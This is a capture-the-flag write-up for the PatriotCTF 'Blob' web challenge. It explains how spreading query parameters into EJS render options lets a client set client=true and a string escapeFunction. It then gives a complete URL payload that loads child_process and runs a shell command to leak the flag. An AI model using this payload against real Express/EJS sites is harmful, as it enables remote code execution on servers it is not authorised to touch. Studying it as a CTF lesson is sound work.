PatriotCTF | Blob (Web)
EJS prototype pollution (medium)
We first read the code:
// The entire challenge application: every query parameter is spread into the
// render options, so the client controls keys such as "settings".
require("express")()
.set("view engine", "ejs")
.use((req, res) => res.render("index", { blob: "blob", ...req.query }))
.listen(3000);
The website offers limited interactions.

The objective is to exploit the EJS template engine: the flag is never passed to the template as a variable, so our only course of action is to turn the template options into remote code execution. Because req.query is spread into the render options, a query key such as settings[view options][...] is forwarded to EJS as compile options. With client=true, EJS prepends escapeFunction.toString() to the generated template source, so when escapeFunction is a string instead of a function that string is inserted verbatim as JavaScript.
After some digging we came across a GitHub issue describing this behaviour that is still unfixed.
After trying the payload we got an exception: if the command runs without errors nothing is shown, but if it fails the page shows the error message of that command.
I therefore changed the payload so that the error message itself contains the flag. The command cat flag* | sh pipes the flag file into sh, which tries to execute the flag text as a command and echoes it back in the resulting "not found" error on stderr:
cat flag* | sh
http://chal.competitivecyber.club:3000/?settings[view%20options][client]=true&settings[view%20options][escapeFunction]=1;return%20global.process.mainModule.constructor._load(%27child_process%27).execSync(%27cat%20flag*%20|%20sh%27);

The next day the challenge was updated so the exception no longer occurred: you could run just about any command and get its output back directly. I still prefer the error-based approach.